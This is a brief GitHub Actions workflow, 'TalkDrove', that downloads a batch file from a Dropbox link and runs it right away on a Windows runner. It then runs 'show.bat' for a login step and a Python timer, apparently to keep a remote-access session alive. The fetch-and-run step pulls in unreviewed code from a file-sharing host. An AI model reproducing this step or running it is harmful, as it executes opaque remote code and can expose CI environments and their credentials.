name: TalkDrove

on:
  workflow_dispatch:

jobs:
  build:
    name: TalkDrove working
    runs-on: windows-latest
    steps:
      - name: TalkDrove Downloading & Installing Essentials
        run: |
          Invoke-WebRequest -Uri "https://www.dropbox.com/scl/fi/vxr6abyurxqlfyywu00zv/Downloads.bat?rlkey=fnmgq3wiw12algdvmwv9mgzs2&st=3dhy09wq&dl=1" -OutFile "Downloads.bat"
          cmd /c Downloads.bat

      - name: TalkDrove login
        run: cmd /c show.bat
      - name:   Timer
        run: python time.py

